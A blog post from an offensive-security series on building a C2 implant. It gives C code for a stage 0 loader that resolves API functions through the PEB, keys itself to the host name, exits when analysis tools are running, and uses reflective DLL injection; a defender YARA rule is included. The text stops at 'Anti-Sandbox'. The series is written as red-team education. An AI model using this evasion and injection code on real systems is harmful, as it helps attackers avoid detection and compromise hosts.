Maelstrom #4: Writing a C2 Implant

In this blog, we will discuss how to write a C2 implant for the modern era. We will look at the history of offensive techniques and the progress of defence.

Introduction

In the series so far, we have discussed the purpose and intentions behind a C2, and the design considerations for both the implant and server.

In this post, we will move beyond this theoretical discussion and begin building a basic implant. We'll start by looking at the evolution of offensive and defensive techniques since 2010, to give us context and understanding of the current landscape. We'll then, as with our previous posts, discuss some important concepts that we'll be incorporating into the implant. Finally, we'll walk through the implant design, writing the base of both stage0 and stage1 of the implant for our exemplar C2, Maelstrom.

When discussing C2 implants, people often say that their implant is fully undetectable (ironically, "FUD"). A newly written implant, which hasn't been seen before, will be undetectable as it has not been seen before. Therefore, on disk, and potentially even when run, it won't be flagged. However, this doesn't account for runtime detections, telemetry generated by Windows, or the various methods of reputation ranking used by a modern day endpoint detection.

In 2022, not all companies have yet implemented all the protections that are available to them, including a full SIEM with comprehensive event logging, or even an EDR agent on every device. This can give the impression that steps like we will discuss in this post are not required, but that is simply a result of not having yet met an environment with anything more than Defender. The days of running commands via a command interpreter are long gone:

    public void ExecuteCommand(String command)
    {
       Process p = new Process();
       ProcessStartInfo startInfo = new ProcessStartInfo();
       startInfo.FileName = "cmd.exe";
       startInfo.Arguments = @"/c " + command; // cmd.exe spesific implementation
       p.StartInfo = startInfo;
       p.Start();
    }

Objectives

This post will cover:

  • The background and development of offensive and defensive techniques around implants.

  • The functions and code required for a contempory Stage 0, including:

    • Environmental Keying

    • Detecting Suspicious Processes

    • Anti-Sandbox Protections

    • Anti-Debug Protections

  • The functions and code required for a contemporary Stage 1, including:

    • Reflective Loading

    • DLL Debugging

    • Server Checkins

    • Sleeping

From this point, we will have an implant which can manage basic checkins, and which can be augmented with more sophisticated functionality evasive techniques, and other opsec features. We will explore these in later blogs, but for further information on evasive techniques, Check Point Research: Evasion techniques can be used as a reference.

As we've mentioned in a similar paragraph in every blog post so far, and will continue mentioning in every post so far but after, the code will serve to illustrate the functionality, but is far from being immediately usable within a functional C2.

Stage 0:

  • Environmental Keying

  • Detecting Suspicious Processes

  • Anti-Sandbox

  • Anti-Debug

Stage 1:

  • Checking-in to the server

For further information on evasive techniques, Check Point Research: Evasion techniques can be used as a reference.

Evolution of Offensive and Defensive Techniques

Over the years, code execution has gotten more and more complicated as defensive techniques and processes, improved requiring more sophisticated approaches. In this section, we want to just nail down the evolution and history of both offence and defence within this space. By doing so, we hope to build an understanding of why some behaviours are absolutely necessary in today's red team environment.

While some implants may be anti-virus proof, able to run without detection and execute commands within a system, this is a far cry from being able to operate as a viable C2 within a network with an up-to-date EDR and a correctly configured SIEM. Indeed, without these actions in place, a red team is likely to not provide value to an organisation as many of the recommendations will simply be unapplicable to a network with that level of maturity.

2010s

Back in the day when Metasploit was king, it would be possible to get away with running commands from the shell. Meaning the implant.exe running on the host would call cmd.exe, and then the command wrapped within the /c flag. This would produce the following process tree:

-> implant.exe
  -> cmd.exe
    -> whoami.exe

This is all fine when runtime rules are not being executed on specific behaviour. Also around this time, we had one-shot-kill exploits such as MS08-67 which would essentially work as a point-and-click exploit giving NT AUTHORITY/SYSTEM access.

Obviously we cannot speak for every Anti-Virus vendor, but around this time almost all detections were performed on static analysis and required malware families to be known. This is still partially the case in modern day with static detection, however now there is a lot of crowdsourcing with companies such as Virus Total, and the adaption of Machine Learning - as seen in Intercept X: Powered by Deep Learning.

2014 - 2016

From the cmd.exe phase, the community went into a very PowerShell oriented style. This spawned projects like Empire in 2016 which was the first Command and Control (C2) Framework which was written entirely in PowerShell. Around the same time, the original PoshC2 was produced. At the time, PowerShell was working well. Around the same time, Antimalware Scan Interface (AMSI) was picking up. From This is how attackers bypass Microsoft's AMSI anti-malware scanning protection, the release appears to be 2015. At the time, and still somewhat to this day, AMSI has been trivial to bypass. Because of this, websites such as amsi.fail were created to generate obfuscated AMSI Bypasses from the following sources:

Also, around 2016, Invoke-Obfuscation was produced to severely obfuscate PowerShell. Later, in 2016, Raphael Mudge wrote Modern Defenses and YOU!. This blog post details why operators should move away from PowerShell due to its popularity. This was reinforced by Microsoft in 2017 when they released Defending Against PowerShell Attacks and then a tweet from Matt Graeber which alludes to PowerShell being too popular and the new technique being .NET .

Whilst all this was going on, every aspect of offensive PowerShell required was built into one suite: PowerSploit.

Cobalt Strike 3.11 - The snake that eats its tail introduces execute-assembly which would dictate the next few years...

Around time time in the Defensive component of the industry, Anti-Virus vendors were making a migration into the detection and mitigation of Zero Day Exploits due to an increase in the usage of these from APTs, a portion of which were attributed to Chinese Military Groups.

Over this period of time, we saw the rise of companies such as CrowdStrike, SentinelOne, Cylance and a few others. We do not know the internals of these companies and how/when/why they started implemented their in-memory and technique based detections. But this period of time is likely where techniques such as Userland Hooking, registering Kernel Callback's to determine suspicious behaviour and then the introduction of languages such as Lua to write rules to parse the logs generated by such protections. Using Lua in such a way is a known use case of Microsoft Defender for Endpoint (MDE) and has been extracted by researchers, as seen in ExtractedDefender.

2017 - 2019

When Cobalt Strike introduced execute-assembly, the usage of .NET exploded and is still somewhat popular today. Projects like SharpCollection were created to build nightly releases of a bunch of tools, but this doesn't touch the surface on the attack tools throughout the internet. Around this time, Covenant was the first C2 to popularize .NET as a C2 Framework.

Likely due to this popularity, Microsoft added backwards compatibility and general support for AMSI. In Whats new in .NET 4.8:

Antimalware scanning for all assemblies. In previous versions of .NET Framework, the runtime scans all assemblies loaded from disk using either Windows Defender or third-party antimalware software. However, assemblies loaded from other sources, such as by the [Assembly.Load(Byte])) method, are not scanned and can potentially contain undetected malware. Starting with .NET Framework 4.8 running on Windows 10, the runtime triggers a scan by antimalware solutions that implement the Antimalware Scan Interface (AMSI).

At the time, it received some praise online. This would be trivial to handle by heavily obfuscating the assembly, or creating .NET Loaders to encrypt and reflect the malicious tool with Assembly.Load. Dom Chell did a great talk on this in 2020: Dominic Chell - Offensive Development: Post Exploitation Tradecraft in an EDR World.

Similarly to PowerShell, SharpSploit was produced solving a huge portion of offensive requirements. An argument can be made that when a full attack suite for a given language is developed, it could be the end of an era for that language.

It was around 2019/2020 where the community began experimenting with things like Nim and Dynamic Language Runtime Overview (DLR) with projects such as SILENTTRINITY and OffensiveDLR.

2019 - 2020

Like execute-assembly, Cobalt Strike somewhat changed the typical tooling approach by introducing inline-execute in Cobalt Strike 4.0 – Bring Your Own Weaponization:

Finally, Cobalt Strike 4.0 introduces an internal inline-execute post-exploitation pattern. Inline-execute passes a capability to Beacon as needed, executes it inline, and cleans up the capability after it ran. This post-exploitation interface paves the way for future features that execute within Beacon’s process context without bloating the agent itself.

Along with inline-execute, Cobalt Strike introduced the idea of Beacon Object Files:

A Beacon Object File (BOF) is a compiled C program, written to a convention that allows it to execute within a Beacon process and use internal Beacon APIs. BOFs are a way to rapidly extend the Beacon agent with new post-exploitation features.

Essentially, they are just specifically crafted Common Object File Format (COFF) Files. The benefit, as TrusedSec point out in A Developer’s Introduction To Beacon Object Files, is that the operator benefits from running code inside of beacon process itself, avoiding creating a child process which is something that the in-built execute-assembly suffers from.

TrustedSec then went onto produce:

Around the same time, people began reinterpreting the execute-assembly function by rewriting the CLR and executing it as a RDLL:

With this heavy investment in rewriting key parts of Cobalt Strike, the stream of new C2s became a torrent. While custom C2 development had always been a part of the industry, Cobalt Strike's off-the-shelf nature and market dominance seemed to eclipse much of this activity. However, from 2019 onwards, more and more courses and blogs endorsed the concept of custom C2 authorship as a viable alternative to a commercial C2, or even as a straightforward learning exercise.

2022

Cobalt Strike for many years, in our experience at any rate, was the C2. Even with the growth of other C2s, Cobalt Strike remains the C2 that C2s are compared to, the Sennheiser HD600's of the offensive tools. Cobalt Strike's interface and operation (and Armitage before it) remain "what a C2 looks like", at least in our minds. Although we've not seen many imitate the device canvas (or, sadly, the lightning).

While there are arguments to be made for other projects, Cobalt Strike has been steering the industry, for both Offence and Defence, for years. The frequent and information dense blogs and videos helped both offensive and defensive teams improve their techniques in a way that few other vendors have done.

Raphael Mudge's video playlists:

Then then entire blog: Cobalt Strike: Blog

Researchers worked on "How to improve X in Cobalt Strike" for a long time, and the change to actually building new and unique tooling has only shifted over the past few years. For defensive teams, Cobalt Strike is still frequently seen and will be for a while. This comes from its leaks and cracks over the years and its continued effectiveness.

Since Raphael Mudge stepped down from the team, Help Systems have been primarily working on stability which has given detection a lot of time to catch-up. Due to this, the detection rate for Cobalt Strike both on disk, and in memory, have drastically increased. Obviously, Cobalt Strike remains a completely viable and good option for a C2, but the industry has started to see some titans emerge to rival Cobalt Strike.

In response, in recent posts Cobalt Strike has begun to discuss working on more evasive features, such as: Arsenal Kit Update: Thread Stack Spoofing. The Cobalt Strike Roadmap Update discusses this further, mapping their future progression.

As Raphael Mudge took his foot off the gas and the research efforts slowed down, it caused the industry to begin building out their own tooling to reduce the amount of signatures that they would have to deal with. As more and more people began building these tools, the C2 Matrix began in order to track them. However, there are two titans who are at the forefront of advanced functionality:

Both of these offer advanced evasive technology baked into the product, and are aimed at working in sophisticated environments with high levels of protection in place.

By writing an entirely new C2 from scratch, if gives the operators full control of the implant and communications. For example, as the use of memory sweeps becomes more common, it may be a requirement to fluctuate the page permissions of the memory region in which the implant is operating out of. If the operator is using Cobalt Strike, then something like ShellcodeFluctuation could be used. The issue here is that its an extra piece of shellcode to execute, and it places a hook on the KERNEL32!Sleep function, increasing the indicators of compromise. Whereas the the C2 was completely open to the operators, then this could just be a setting to enable and disable on a per-implant basis.

When it comes to modern day defences, its a continuation of the things we've recently discussed. However, the internals of these techniques have gone through endless amount of research and development to better empower the techniques. We've also seen the introduction of feeds into Event Tracing for Windows (ETW) for Threat Intelligence known as ETWTi, more on this in Introduction to Threat Intelligence ETW. As well as ingesting ETWTi feeds, more generic ETW feeds have seen use. For example, the usage of the DotNet Runtime traces to determine assemblies being loaded.

In the next two blogs, we will look at implementing a few of these techniques. Namely, ETWTi, Userland hooks, ETW, AMSI and memory sweeps.

Important Concepts

In this section, we want to outline a few topics that will come up when building out the implant so that they make sense and we can demonstrate the implant effectively.

OS Shell Commands

When discussing OS Shell Commands, we don't mean just cmd.exe. This is anything that causes a a child process to spawn to run the command, every language has its equivalent. To name a few:

We've mentioned it a few times now, but lets look at why running post exploitation under cmd.exe is a bad idea. In a more traditional environment, running commands directly on a host may be considered normal behaviour for an operator. However, as we've explored, the level of detections and awareness that an operator can expect within a contemporary environment is far higher. Advances in logging, especially within Windows, as well as a greater awareness of which events to pay attention to, as well as EDR and intermediary security devices have resulted in a state of play where directly running commands can worst case be immediately considered an indicator of compromise, and best case a highly suspicious activity as can be seen by the fact it has a formal MITRE ATT&CK reference as: Command and Scripting Interpreter (T1059).

While LOLBINs and aliases still have a role to play, using these for downloads and command execution is an exercise in operational security by obscurity. Techniques relying on increasingly more unknown Windows built-ins can be quickly neutralised with a simple blocklist. This may be by reimplementing the logic within the implant, or by finding the base functions that the commands themselves use and calling them directly, bypassing any calls to run commands via cmd.exe.

Fundamentally Windows cannot block the features that Windows itself has to use. Since these calls are so ubiquitous, since every feature in Windows makes use of these, they are now reliant on EDR using hooks and callbacks.

Overall, there are more ways to reimplement and refactor code with the WinAPI than there will be to execute commands via OS-based command execution or random LOLBINs. This is something that Cobalt Strike documented: OPSEC Considerations for Beacon Commands.

WinAPI

The WinAPI are functions that are exported from various DLLs, most of which can be seen in c:\windows\system32, and they give access to all different components of Windows. Its utility is far too comprehensive to discuss, but here is an example. Within Kernel32.dll theres a function called VirtualAlloc:

LPVOID VirtualAlloc(
  [in, optional] LPVOID lpAddress,
  [in]           SIZE_T dwSize,
  [in]           DWORD  flAllocationType,
  [in]           DWORD  flProtect
);

And for the most part, these APIs are documented on MSDN. As these functions are written by Microsoft, and marked as proprietary, projects such as ReactOS attempt at recreating this. So, when we get discuss Userland Hooks and such in future blogs, we will also discuss how and why reimplementing the function, without using the function, will typically avoid specific detections.

For now, though, the WINAPI is giving us access to calls that will make this entire process easier.

Process Environment Block

Windows is an Object Oriented Operating System. Meaning, everything operated is an object and will have some form of data structure. Processes fall into this category. A Process, like calc.exe, has an object called Process Environment Block (PEB) which contains all sorts of information:

  • Process Name

  • Location

  • Is it being debugged

  • Loaded modules

  • Environment Path

  • Etc

This is all stored in a structure like so:

typedef struct _PEB {
  BYTE                          Reserved1[2];
  BYTE                          BeingDebugged;
  BYTE                          Reserved2[1];
  PVOID                         Reserved3[2];
  PPEB_LDR_DATA                 Ldr;
  PRTL_USER_PROCESS_PARAMETERS  ProcessParameters;
  PVOID                         Reserved4[3];
  PVOID                         AtlThunkSListPtr;
  PVOID                         Reserved5;
  ULONG                         Reserved6;
  PVOID                         Reserved7;
  ULONG                         Reserved8;
  ULONG                         AtlThunkSListPtr32;
  PVOID                         Reserved9[45];
  BYTE                          Reserved10[96];
  PPS_POST_PROCESS_INIT_ROUTINE PostProcessInitRoutine;
  BYTE                          Reserved11[128];
  PVOID                         Reserved12[1];
  ULONG                         SessionId;
} PEB, *PPEB;

Throughout this blog, we will interact with the PEB a lot, mainly to get enumerate loaded modules and such. As this is a pretty extensive topic, we won't discuss it all and have some recommended reads. But for now, know the PEB as the structure in which the process is build upon.

Position Independent Code

When we talk about Position Independent Code, we are talking about C code that is written in a very specific way, with additional restrictions. The goal is to have all the code we plan to execute inside the .text section of the PE.

Writing C normally will cause different parts of the code to be stored in different sections:

  • Global Variables in .bss

  • Imported DLLs in .idata

  • Exports in .data

  • CHAR* and WCHAR* in .rdata

Even with all those limitations, we can still achieve our goal. We just need to write code in a very specific way to avoid these different section allocations. By doing so, we ensure all the code is in the .text section. We need this because that is the section required for storing all of the binary code. If part of the code is in .bss, then it will crash because we're only going to extract the .text.

For example, lets assume this string:

const char* String = "hello world";

Because this is read-only initialised data, it goes into .rdata. To get this to be PIC, we write it as such:

char String[] = {'a', 'b', 'c', 0};

What if we want to use VirtualAlloc? If its just called as is, then it will have Kernel32 as an import. To get around this, we will need to dynamically load the DLL, and then resolve the address (more on this later).

One final note, to ensure we don't have CRT controlling the execution flow of the PE, we need to make sure that the entry-point is not main or some other form of winmain, wmain, etc. We will show this later on in the Makefile.

For more on this, we recommend: PE Reflection: The King is Dead, Long Live the King.

Supporting Post Exploitation

When discussing implants, there are several methods of supporting post explotation utilities. For the most part, implants will have a majority of their functionality embedded in the implant. So, when the implant recieves a command, the command will go through some sort of switch statement:

switch(job):
    case 1:
        whoami();
        break;
    case 2:
        hostname();
        break;  

Alternatively, the implant could work as a loader; supporting:

This ensures that the actual implant is significantly smaller, and all functionality is modular. However, this comes at the cost of constant memory allocations for each job. The method chosen is entirely defendant on the use case, but we should it will be addressed. For us, we will stick the the traditional all functionality embedded variant.

Types of implants

If the implant is to be .NET, then a simple assembly that's dynamically loaded is fine. However, this is not the type of implant we are discussing. For an implant written in C(++) there are some options on the type of implant to use.

Position Independent

The implant could quite well be Position Independent and the entry point could be resolved, this is seen in SleepyCrypt where the functionality is allocated with VirtualAlloc and casted to a function, like so:

// Copy the shellcode into it.
memcpy( pBuffer, shellcode_bin, shellcode_bin_len );

// Make a function pointer to the run function shellcode.
fprun Run = ( fprun )pBuffer;

Dynamic Link Library

More commonly, the implant could be written as a Dynamic Link Library (DLL). DLLs are typically loaded with LoadLibraryA:

HMODULE hModule = LoadLibraryA("c:\\implant.dll");

The issue here is that LoadLibraryA requires the DLL to be on disk which would break the golden rule of OpSec: Don't write to disk. Doing so will leave artifacts behind, allowing for the implant to be signatured, resulting in more time on trying to break the signature.

The Golden Rule of OpSec: Don't write to disk!*

* Unless you need to, or unless you know how to avoid the detection, or... except... and... ... other caveats

Reflective DLLs

This led to a technique known as Reflective DLLs (RDLL), first produced by Stephen Fewer around 11 years ago. The ReflectiveDLLInjection repository contains the original code. Since then, the technique has been updated, but lets discuss the original. The description:

Reflective DLL injection is a library injection technique in which the concept of reflective programming is employed to perform the loading of a library from memory into a host process. As such the library is responsible for loading itself by implementing a minimal Portable Executable (PE) file loader. It can then govern, with minimal interaction with the host system and process, how it will load and interact with the host.

Essentially whats going to happen is the RDLL will be allocated similarly to typical shellcode:

However, before the thread is created, the Relative Virtual Address (RVA) is calculated by searching the Process Environment Block (PEB) for the Export Directory, and then all the exports to identify the RDLLs Export (which is simply a function exposed from the DLL).

See also: The .edata Section, more on the PEB structure later.

Once the exported address has been found, the offset is added to the base address of the allocated space for the RDLL. Like so:

LPVOID lpBuffer = NULL /* This will be the buffer containing the RDLL */;
DWORD dwReflectiveLoaderOffset = GetReflectiveLoaderOffset( lpBuffer );
LPVOID lpRemoteLibraryBuffer = VirtualAllocEx( hProcess, NULL, dwLength, MEM_RESERVE|MEM_COMMIT, PAGE_EXECUTE_READWRITE ); 
LPVOID lpReflectiveLoader = (LPTHREAD_START_ROUTINE)( (ULONG_PTR)lpRemoteLibraryBuffer + dwReflectiveLoaderOffset );
  • First off, lpBuffer can be from anywhere; downloaded from the internet, read from a file, etc. For an implant, its likely downloaded over some sort of channel (HTTP).

  • With the buffer, it is then cycled through to find the RVA of the exported function.

  • Now that the offset is determined, and stored in dwReflectiveLoaderOffset, lpRemoteLibraryBuffer will be the base address returned from VirtualAllocEx.

  • The space is allocated, and the export offset found, they can be added together to get the address of the exported function.

All that needs to happen now is for the thread to be created at this point to execute the loader:

hThread = CreateRemoteThread( hProcess, NULL, 1024*1024, lpReflectiveLoader, lpParameter, (DWORD)NULL, &dwThreadId );

All of this can be seen in LoadRemoteLibraryR from the repository.

The exported function can be seen in the DLLEXPORT of ReflectiveLoader; this is the function the thread triggers on. The code is well documented, so we will not discuss the codebase.

There are some issues with RDLLs, and we will discuss them in the future post in which we perform a static/runtime analysis of the implant. For defenders, make sure there is a signature for the this technique and ensure the ReflectiveLoader string is treated as malicious as seen on alienvault.com:

import "pe"
rule ReflectiveLoader
{
    meta: description = "Detects a unspecified hack tool, crack or malware using a reflective loader  no hard match  further investigation recommended"
    reference = "Internal Research"
    score = 60
    strings:
        $s1 = "ReflectiveLoader" fullword ascii
        $s2 = "ReflectivLoader.dll" fullword ascii
        $s3 = "?ReflectiveLoader@@" ascii
    condition:
    uint16(0) == 0x5a4d and ( 1 of them or pe.exports("ReflectiveLoader") or pe.exports("_ReflectiveLoader@4") or pe.exports("?ReflectiveLoader@@YGKPAX@Z") )
}

This is the technique we will follow for Maelstrom.

Recap of the Execution Flow

During Maelstrom: The C2 Architecture we discussed the execution flow that the implant will take:

  • Stage 0: A Position Independent Loader

  • Stage 1: Reflective DLL

By making the stage 0 loader PIC, we can wrap it into any other form of loader required. Once the Stage 0 executes, it will load a Reflective DLL which will be the main implant (Stage 1).

Simple.

Stage 0

Maelstrom WinAPI Resolution

Before getting into the stager, we need to cover how Maelstrom resolves WinAPI functions. In order to keep our actual C2s functionality somewhat guarded, we're opting to use publicly accessible code throughout this series. One solution is paranoidninja/PIC-Get-Privileges/blob/main/addresshunter.h, and an alternative could be: Speedi13/Custom-GetProcAddress-and-GetModuleHandle-and-more/blob/master/CustomWinApi.cpp#L168.

Parsing the PEB is not a difficult task, and it is all over the internet. CAPA even has rules for this. The function from Paranoid Ninja's example:

FARPROC GetSymbolAddress(HANDLE hModule, LPCSTR lpProcName) {
    UINT64 uiModuleAddress = (UINT64)hModule;
    UINT64 uiSymbolAddress = 0;
    UINT64 uiExportedAddressTable = 0;
    UINT64 uiNamePointerTable = 0;
    UINT64 uiOrdinalTable = 0;

    if (hModule == NULL) {
        return 0;
    }

    PIMAGE_NT_HEADERS NtHeaders = (PIMAGE_NT_HEADERS)(uiModuleAddress + ((PIMAGE_DOS_HEADER)uiModuleAddress)->e_lfanew);
    PIMAGE_DATA_DIRECTORY DataDir = (PIMAGE_DATA_DIRECTORY)&NtHeaders->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT];
    PIMAGE_EXPORT_DIRECTORY ExportDir = (PIMAGE_EXPORT_DIRECTORY)(uiModuleAddress + DataDir->VirtualAddress);

    uiExportedAddressTable = (uiModuleAddress + ExportDir->AddressOfFunctions);
    uiNamePointerTable = (uiModuleAddress + ExportDir->AddressOfNames);
    uiOrdinalTable = (uiModuleAddress + ExportDir->AddressOfNameOrdinals);

    if (((UINT64)lpProcName & 0xFFFF0000) == 0x00000000) {
        uiExportedAddressTable += ((IMAGE_ORDINAL((UINT64)lpProcName) - ExportDir->Base) * sizeof(DWORD));
        uiSymbolAddress = (UINT64)(uiModuleAddress + DEREF_32(uiExportedAddressTable));
    }
    else {
        DWORD dwCounter = ExportDir->NumberOfNames;
        while (dwCounter--) {
            char* cpExportedFunctionName = (char*)(uiModuleAddress + DEREF_32(uiNamePointerTable));
            if (Strcmp(cpExportedFunctionName, lpProcName) == 0) {
                uiExportedAddressTable += (DEREF_16(uiOrdinalTable) * sizeof(DWORD));
                uiSymbolAddress = (UINT64)(uiModuleAddress + DEREF_32(uiExportedAddressTable));
                break;
            }
            uiNamePointerTable += sizeof(DWORD);
            uiOrdinalTable += sizeof(WORD);
        }
    }

    return (FARPROC)uiSymbolAddress;
}

First, pass in a module base address and cast it to uiModuleAddress:

UINT64 uiModuleAddress = (UINT64)hModule;

This is the used to identify the Export Directory, again, this is a standard technique:

PIMAGE_NT_HEADERS NtHeaders = (PIMAGE_NT_HEADERS)(uiModuleAddress + ((PIMAGE_DOS_HEADER)uiModuleAddress)->e_lfanew);
PIMAGE_DATA_DIRECTORY DataDir = (PIMAGE_DATA_DIRECTORY)&NtHeaders->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT];
PIMAGE_EXPORT_DIRECTORY ExportDir = (PIMAGE_EXPORT_DIRECTORY)(uiModuleAddress + DataDir->VirtualAddress);

Get the offset of the NT Headers by adding the base address and offsetting it with the DOS Headers to give the e_lfanew. Then, using that value, extract the Data Directory struct. Finally, specifically get the Export Directory by offsetting the module base with the data directories virtual address. Now access to the Export Directory has been achieved.

Now it is just a case of looping through all the exported functions from that directory until the strings match:

DWORD dwCounter = ExportDir->NumberOfNames;
while (dwCounter--) {
    char* cpExportedFunctionName = (char*)(uiModuleAddress + DEREF_32(uiNamePointerTable));
    if (Strcmp(cpExportedFunctionName, lpProcName) == 0) {
        uiExportedAddressTable += (DEREF_16(uiOrdinalTable) * sizeof(DWORD));
        uiSymbolAddress = (UINT64)(uiModuleAddress + DEREF_32(uiExportedAddressTable));
        break;
    }
    uiNamePointerTable += sizeof(DWORD);
    uiOrdinalTable += sizeof(WORD);
}

As strcmp cannot be used without resolving it... its easier to just get the source code:

int STRCMP(const char* p1, const char* p2)
{
    const unsigned char* s1 = (const unsigned char*)p1;
    const unsigned char* s2 = (const unsigned char*)p2;
    unsigned char c1, c2;
    do
    {
        c1 = (unsigned char)*s1++;
        c2 = (unsigned char)*s2++;
        if (c1 == '\0')
            return c1 - c2;
    } while (c1 == c2);
    return c1 - c2;
}

void* MEMSET2(void* dest, int val, size_t len)
{
    unsigned char* ptr = dest;
    while (len-- > 0)
        *ptr++ = val;
    return dest;
}

When STRCMP matches, we return the symbolAddress after the break:

return (FARPROC)uiSymbolAddress;

So where is the module base address coming from? Well:

LPVOID GetKernel32() {
    LPVOID pKernel32Dll = NULL;
    pKernel32Dll = GetModuleByHash(KERNEL32DLL_HASH1);
    if (NULL == pKernel32Dll) {
        pKernel32Dll = GetModuleByHash(KERNEL32DLL_HASH2);
        if (NULL == pKernel32Dll) {
            pKernel32Dll = GetModuleByHash(KERNEL32DLL_HASH3);
            if (NULL == pKernel32Dll) {
                return NULL;
            }
        }
    }
    return pKernel32Dll;
}

Three DJB2 hashes are defined:

#define KERNEL32DLL_HASH1   0xa709e74f /// Hash of KERNEL32.DLL
#define KERNEL32DLL_HASH2   0xa96f406f /// Hash of kernel32.dll
#define KERNEL32DLL_HASH3   0x8b03944f /// Hash of Kernel32.dll

Then, parsing the PEB we can obtain the DLLBase:

LPVOID GetModuleByHash(UINT uiModuleHash) {
    PEB* peb = (PEB*)PPEB_PTR;
    if (NULL == peb) {
        return NULL;
    }

    PEB_LDR_DATA* pLdr = peb->Ldr;
    LIST_ENTRY* pListHead = &(pLdr->InMemoryOrderModuleList);
    LIST_ENTRY* pListEntry = NULL;
    LDR_DATA_TABLE_ENTRY_COMPLETED* pLdrEntry;

    for (pListEntry = pListHead->Flink; pListEntry != pListHead; pListEntry = pListEntry->Flink) {
        pLdrEntry = (LDR_DATA_TABLE_ENTRY_COMPLETED*)((PCHAR)pListEntry - sizeof(LIST_ENTRY));
        WCHAR* pwDllName = pLdrEntry->BaseDllName.Buffer;
        UINT wHash = Djb2HashW(pwDllName);
        if (wHash == uiModuleHash) {
            return pLdrEntry->DllBase;
        }
    }
    return NULL;
}

First off, get the PEB Struct:

PEB* peb = (PEB*)PPEB_PTR;

Where PPEB_PTR is:

#define PPEB_PTR __readgsqword(0x60)

Read from the offset of 0x60 gives access to the PEB. Next, we can get the PEB_LDR_DATA struct by simply accessing it:

PEB_LDR_DATA* pLdr = peb->Ldr;

Then get access to the module list:

LIST_ENTRY* pListHead = &(pLdr->InMemoryOrderModuleList);
LIST_ENTRY* pListEntry = NULL;
LDR_DATA_TABLE_ENTRY_COMPLETED* pLdrEntry;

As seen in the struct:

typedef struct _PEB_LDR_DATA {
  BYTE       Reserved1[8];
  PVOID      Reserved2[3];
  LIST_ENTRY InMemoryOrderModuleList;
} PEB_LDR_DATA, *PPEB_LDR_DATA;

Then loop over it until the hashes match. When they do, that will be the DLL required.

Now its a case of casting to the function type, but before that; here is how the APIs are stored:

typedef struct API_ {
    LPVOID LoadLibraryA;
    LPVOID CloseHandle;
    LPVOID GlobalMemoryStatusEx;
    LPVOID CreateToolhelp32Snapshot;
    LPVOID Process32NextW;
    LPVOID Process32FirstW;
    LPVOID GetComputerNameW;
    LPVOID Sleep;
    LPVOID WinHttpCloseHandle;
    LPVOID WinHttpQueryDataAvailable;
    LPVOID WinHttpQueryHeaders;
    LPVOID WinHttpReadData;
    LPVOID WinHttpReceiveResponse;
    LPVOID WinHttpSendRequest;
    LPVOID WinHttpSetOption;
    LPVOID WinHttpConnect;
    LPVOID WinHttpOpen;
    LPVOID WinHttpOpenRequest;
    LPVOID WinHttpAddRequestHeaders;
    LPVOID GlobalFree;
    LPVOID malloc;
    LPVOID free;
    LPVOID memset;
    LPVOID VirtualProtect;
    LPVOID VirtualAlloc;
    LPVOID CreateThread;
    LPVOID WaitForSingleObject;
    LPVOID VirtualFree;
}
API, * PAPI;

In the case of LoadLibraryA:

typedef HMODULE(WINAPI* LOADLIBRARYA)(LPCSTR lpLibFileName);
CHAR cLoadLibraryA[13] = { 'L', 'o', 'a', 'd','L','i','b','r','a','r','y','A',0 };
Api->LoadLibraryA = GetSymbolAddress(hKernel32, cLoadLibraryA);

Then using it:

CHAR cWinHTTP[8] = { 'w','i','n','h','t','t','p',0 };
HMODULE hWinHttp = ((LOADLIBRARYA)api.LoadLibraryA)(cWinHTTP);

Now onto the stager!

Quick recap of Stage 0. Before running malicious code on a host to get an implant, some initial enumeration and checks are going to be put into place. For an Adversary Simulation exercise, this keeps the attackers within scope, whilst also ensuring that the implant is only executed when it is safe to do so.

Additionally, this entry point will all be Position Independent; meaning that all of the code will be within the .text section, allowing for the opcodes to be extracted, thus giving shellcode to execute in other methods.

Note, Position Independent Code will not be discussed at length within this post, it is recommended to read Executing Position Independent Shellcode from Object Files in Memory.

Functionality

In this section, we want to discuss some functionality that can be added to a stage 0. Obviously, it doesn't need to ALL go in, but its just some things we found interesting and/or useful.

Environmental Keying

First up, Environmental Keying, or Guardrailing. This has two purposes:

  • If the Environmental information embedded in the stager does not match what was enumerated, then return.

  • Encrypt the stage 1 DLL with some information obtained from the environment, and decrypt it at runtime.

The second point can be completely automated, this is not something done in Maelstrom, but it easy to send some information back to the C2, and then encrypt the DLL with that information before returning it to the stager.

As far as methods of doing this, there are a ton and quite frankly its down to creativity. A few examples can be shown here:

An even easier method is use something like GetComputerNameW or GetUserNameW. This is pretty basic and a combination of these types of calls could be used.

In the case of Maelstrom, we simply hash the computername and check it with this function:

BOOL IsCorrectEnvironment(API api) {
    WCHAR wHostname[MAX_COMPUTERNAME_LENGTH];
    DWORD dwSz = sizeof wHostname;

    if (((GETCOMPUTERNAMEW)api.GetComputerNameW)(wHostname, &dwSz)) {
        if (Djb2HashW(wHostname) == HOSTNAME_HASH) {
            return TRUE;
        }
    }
    return FALSE;
}

Which is called like so:

if (IsCorrectEnvironment(Api) == FALSE) {
    return FALSE;
}

To AES256 encrypt a payload using this technique, it can be read in Greta: Windows Crypto, and Recursive Keying. Maelstrom will not make use of this as this is purely a Proof-of-concept.

So, back to the keying. If the computername doesnt match, then it returns -1 and will exit. Otherwise, it moves on.

Detecting Suspicious Processes

This is a fun one, it adds an extra layer of hindering blue teams. Its quite simple, if a process is found, exit. In the following example only one process is being checked for, but its not an extra issue to loop over a bunch:

BOOL AreSuspiciousProcessesRunning(API Api) {
    HANDLE hSnapshot;
    PROCESSENTRY32W pe32;

    hSnapshot = ((CREATETOOLHELP32SNAPSHOT)Api.CreateToolhelp32Snapshot)(TH32CS_SNAPPROCESS, 0);
    if (hSnapshot == INVALID_HANDLE_VALUE) {
        return FALSE;
    }

    pe32.dwSize = sizeof(PROCESSENTRY32W);

    if (!((PROCESS32FIRSTW)Api.Process32FirstW)(hSnapshot, &pe32)) return FALSE;

    do {
        if (Djb2HashW(pe32.szExeFile) == PROCESS_HACKER_HASH) {
            return TRUE;
        }
    } while (((PROCESS32NEXTW)Api.Process32NextW)(hSnapshot, &pe32));

    ((CLOSEHANDLE)Api.CloseHandle)(hSnapshot);
    return FALSE;
}

Loop over all processes, if the hashed value of process is the same as the one defined, then return TRUE. In this case, it is Process Hacker.exe:

#define PROCESS_HACKER_HASH 0xda24bd3c

This is executed like so:

if (AreSuspiciousProcessesRunning(Api)) {
    return FALSE;
}

Anti-Sandbox

